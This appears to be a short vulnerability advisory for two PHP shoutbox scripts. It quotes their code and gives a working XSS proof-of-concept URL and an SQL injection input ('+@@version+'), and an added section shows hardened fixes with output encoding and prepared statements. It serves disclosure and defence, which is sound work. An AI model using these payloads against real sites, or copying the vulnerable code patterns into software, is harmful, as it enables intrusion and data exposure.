Today I have found an XSS hole in the “Advanced Shoutbox” script and the same XSS hole and an SQL injection vulnerability in the “MySql shoutbox” which are available here: http://plohni.com/wb/content/php/Free_scripts.php
Advanced Shoutbox
index.php Line 37:
<form action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post">
index.php Line 79-82:
if($display == "all"){
?><a href="<?php echo $_SERVER["PHP_SELF"]; ?>">View small shoutbox</a><?php
}else{
?><a href="<?php echo $_SERVER["PHP_SELF"]; ?>?show=all">View all shouts</a><?php
}
Very easy to exploit:
http://host/PATH_TO_SHOUTBOX/index.php/%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3Cspan
Affected Version: 1.0
MySql shoutbox
The XSS hole is the same as above, but on the lines 50, 55 and 97-99.
SQL Injection:
The index.php does not sanitize the user's input on lines 105 and 106.
$input_name = $_POST["input_name"];
$input_text = $_POST["input_text"];
...
if($row["name"] != $input_name && $row["comment"] != $input_text){
mysql_query("INSERT INTO $db_table (name,comment) VALUES ('$input_name','$input_text');") or die(mysql_error()); //insert name and shout
}
Just send a POST request to index.php. In the name field enter whatever you want and in the text field enter '+@@version+' (including the ' characters).
Affected Version: 1.0
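As an added example that is not part of the advisory or of the shoutbox scripts themselves, the following PHP shows both vulnerable patterns from above next to a hardened version of each; it assumes a mysqli connection in $conn and that $db_table is a trusted table name from the script's configuration.

```php
<?php
// Added example, not the shoutbox's own code. Assumptions: $conn is an open
// mysqli connection and $db_table is a fixed, trusted table name set by the
// script's configuration (as in the original), never taken from the request.

// --- XSS via PHP_SELF ---------------------------------------------------
// Vulnerable: $_SERVER["PHP_SELF"] includes the path appended after index.php
// (e.g. /index.php/"><script>...), so echoing it unencoded into the
// action attribute lets the request path break out of the attribute.
//   echo '<form action="' . $_SERVER["PHP_SELF"] . '" method="post">';
//
// Hardened: encode for the HTML attribute context (ENT_QUOTES also handles
// the double quote used in the advisory's proof of concept).
$self = htmlspecialchars($_SERVER["PHP_SELF"], ENT_QUOTES, "UTF-8");
echo '<form action="' . $self . '" method="post">';
// Even better, do not echo the request path at all when the script name is
// already known:
//   echo '<form action="index.php" method="post">';

// --- SQL injection in the INSERT ----------------------------------------
$input_name = isset($_POST["input_name"]) ? $_POST["input_name"] : "";
$input_text = isset($_POST["input_text"]) ? $_POST["input_text"] : "";

// Vulnerable: the values are interpolated straight into the SQL string, so a
// text value of '+@@version+' closes the quoted literal and injects an
// expression that MySQL evaluates.
//   mysql_query("INSERT INTO $db_table (name,comment) "
//             . "VALUES ('$input_name','$input_text');");
//
// Hardened: a prepared statement keeps user data out of the SQL grammar, so
// quotes in the input are stored as data rather than parsed as syntax.
$stmt = $conn->prepare("INSERT INTO `$db_table` (name, comment) VALUES (?, ?)");
if ($stmt === false) {
    die("prepare failed: " . htmlspecialchars($conn->error, ENT_QUOTES, "UTF-8"));
}
$stmt->bind_param("ss", $input_name, $input_text);
if (!$stmt->execute()) {
    die("execute failed: " . htmlspecialchars($stmt->error, ENT_QUOTES, "UTF-8"));
}
$stmt->close();
```

The same htmlspecialchars() treatment applies to the two "View ..." links quoted from lines 79-82, since they echo PHP_SELF into an href in exactly the same way.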
The vendor was informed on 27.06.2009.
This post was published automatically two weeks after the vendor was informed.